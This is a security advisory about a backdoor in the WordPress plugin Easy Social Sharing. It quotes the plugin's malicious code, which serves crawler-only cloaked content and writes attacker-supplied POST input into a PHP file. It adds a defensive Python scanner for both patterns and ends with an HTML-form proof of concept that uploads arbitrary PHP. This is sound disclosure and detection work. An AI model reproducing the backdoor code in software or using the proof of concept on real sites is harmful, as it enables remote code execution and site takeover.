Vulnerability Details: Possible Remote Code Execution (RCE) Vulnerability in Easy Social Sharing
One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/social-sharing/js/admin.js, from the plugin Easy Social Sharing, not to be confused with another Easy Social Sharing. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.
What we found when looking into this shows one of the problems with trying to find a vulnerability that hackers might be targeting in a plugin: the vulnerabilities they target don’t always exist. Strangely, it looks like some hackers don’t actually test vulnerabilities before trying to exploit them on a large scale. For example, last April we looked at one instance where a fairly obvious false report of a vulnerability still led to exploitation attempts. In this case the vulnerability does actually exist; it just would usually not be exploitable, which we will get to in a moment.
In the case of this plugin it looks like the vulnerability was actually part of intentionally malicious code. In the file /easy-social-sharing.php the addsharehead() function is registered to run when wp_head() is called in a theme:
add_action('wp_head', 'addsharehead');
That function will include the file /wp-content/plugins/social-sharing/install.php if it exists and the request is coming from a search engine’s crawler (this would allow cloaked content to be served to search engines but not to normal visitors):
function addsharehead() {
    // Path of the file that /setup.php is meant to write
    $filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/social-sharing/install.php');
    if (file_exists($filename)) {
        // Only crawlers get the included content; eregi() is a deprecated
        // (PHP 5.3) case-insensitive regex match on the User-Agent header
        if(eregi("slurp|bingbot|googlebot",$_SERVER['HTTP_USER_AGENT'])) {
            include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/social-sharing/install.php');
        } else {
        };
    } else {
    }
}
The file /setup.php is intended to create the install.php file:
<?php
session_start();
// Raw POST input, unauthenticated and unvalidated
$easyshareinstall = $_POST['newins'];
// Note the directory name here differs from the plugin's actual directory
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/easy-social-sharing/install.php', 'w');
$easyshareinstall = str_replace('\\', '', $easyshareinstall);
$easyshareinstall = htmlentities($easyshareinstall);
// Entities are decoded again before writing, so the original input reaches the file
fwrite($fp, html_entity_decode($easyshareinstall));
fclose($fp);
echo $easyshareinstall;
A request sent to that file creates a file named install.php with the content of the POST input “newins”; since the file has a .php extension, that is a remote code execution vulnerability. There was a problem, though, that we noticed when we went to check to make sure that the vulnerability was actually exploitable.
When we sent a request that should have caused the file to be created, it didn’t get created. Looking closer at the code we noticed the problem: the directory of the plugin is “social-sharing”, while the code tries to create the file in the directory “easy-social-sharing”. The function used to create the file, fopen(), will not create a directory that doesn’t exist, so the code will only work if you already have a directory with that name in “wp-content/plugins/”. So unless you also have the other plugin that shares its name, or for some other reason have a directory with that name, the vulnerability won’t work.
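As an added example (not code from this post or from the plugin), here is a small Python scan that looks for the two indicators described above and under setup.php: an include that only runs for search-engine User-Agents, and request input written into a .php file. The sample sources are constructed from the fragments quoted in the post; the relative paths, the benign index.php, the extra bot names and the function-name lists are assumptions, and the taint pass is a deliberately simple heuristic rather than a PHP parser.

```python
"""Static indicators for the two backdoor patterns described above: an
include/require gated on a search-engine User-Agent (cloaking) and request
input written into a .php file (a dropper). Regex heuristics, not a parser."""
import os
import re
import sys

# Constructed sample: the fragments quoted in the post plus one benign file,
# keyed by path relative to wp-content/plugins. Not the plugin's actual files.
SAMPLE_FILES = {
    "social-sharing/easy-social-sharing.php": r'''<?php
function addsharehead() {
    $filename = ($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/social-sharing/install.php');
    if (file_exists($filename)) {
        if(eregi("slurp|bingbot|googlebot",$_SERVER['HTTP_USER_AGENT'])) {
            include($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/social-sharing/install.php');
        }
    }
}
add_action('wp_head', 'addsharehead');
''',
    "social-sharing/setup.php": r'''<?php
session_start();
$easyshareinstall = $_POST['newins'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/easy-social-sharing/install.php', 'w');
$easyshareinstall = str_replace('\\', '', $easyshareinstall);
$easyshareinstall = htmlentities($easyshareinstall);
fwrite($fp, html_entity_decode($easyshareinstall));
fclose($fp);
echo $easyshareinstall;
''',
    "social-sharing/index.php": "<?php // Silence is golden.\n",  # benign (assumed)
}

INPUT_SOURCES = re.compile(r'\$_(POST|GET|REQUEST|COOKIE)\b')
ASSIGN_RE = re.compile(r'(\$[A-Za-z_]\w*)\s*=(?!=)\s*([^;]+);')
# A User-Agent test through the usual PHP string/regex functions, on one line.
UA_CHECK_RE = re.compile(
    r'\b(eregi|ereg|preg_match|stripos|strpos|stristr|strstr)\s*\(([^{;\n]*HTTP_USER_AGENT[^{;\n]*)\)')
BOT_NAMES_RE = re.compile(r'googlebot|bingbot|slurp|yandex|baidu', re.I)  # list is an assumption
INCLUDE_RE = re.compile(r'\b(include|require)(_once)?\b')
FOPEN_PHP_RE = re.compile(r'''\bfopen\s*\(([^;]*?\.php['"])\s*,\s*['"][wax]b?\+?['"]''')
WRITE_RE = re.compile(r'\b(fwrite|fputs|file_put_contents)\s*\(([^;]*)\)\s*;')


def tainted_vars(src):
    """Tiny forward taint pass over assignments: a variable is tainted if its
    right-hand side reads a request superglobal or an already-tainted
    variable. Order-only, no control-flow awareness, by design."""
    tainted = set()
    for name, rhs in ASSIGN_RE.findall(src):
        if INPUT_SOURCES.search(rhs) or any(re.search(re.escape(v) + r'\b', rhs) for v in tainted):
            tainted.add(name)
    return tainted


def scan_source(src):
    """Return a list of human-readable findings for one PHP source text."""
    findings = []
    for m in UA_CHECK_RE.finditer(src):
        # Testing the UA alone is common and benign; the suspicious part is an
        # include/require that is reached only when a crawler is the visitor.
        if BOT_NAMES_RE.search(m.group(2)) and INCLUDE_RE.search(src, m.end()):
            findings.append("cloaking: include/require gated on a search-engine User-Agent")
            break
    tainted = tainted_vars(src)
    php_targets = [m.group(1) for m in FOPEN_PHP_RE.finditer(src)]
    for m in WRITE_RE.finditer(src):
        args = m.group(2)
        if not any(re.search(re.escape(v) + r'\b', args) for v in tainted):
            continue
        if php_targets or ".php" in args:
            target = php_targets[0] if php_targets else args
            findings.append(f"dropper: request input written to a PHP file ({target})")
        else:
            findings.append("request input written to a file")
        break
    return findings


def scan_files(files):
    """Scan {path: source} and return only the paths that produced findings."""
    results = {}
    for path, src in files.items():
        found = scan_source(src)
        if found:
            results[path] = found
    return results


def scan_tree(root):
    """Read every .php file below root (e.g. wp-content/plugins) and scan it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(path, root)] = fh.read()
    return scan_files(files)


if __name__ == "__main__":
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_files(SAMPLE_FILES)
    for path, found in hits.items():
        for finding in found:
            print(f"{path}: {finding}")
```

Run it with no arguments to scan the embedded samples, or pass a plugins directory to scan real files. On the samples it flags only the two malicious files; the plain User-Agent check without a following include is not reported, which keeps ordinary "hide share buttons from bots" code out of the results.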
Proof of Concept
The following proof of concept will place the specified PHP code into the file install.php in the directory /wp-content/plugins/easy-social-sharing/ if that directory already exists.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/social-sharing/setup.php" method="POST">
<input type="hidden" name="newins" value="[PHP code]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>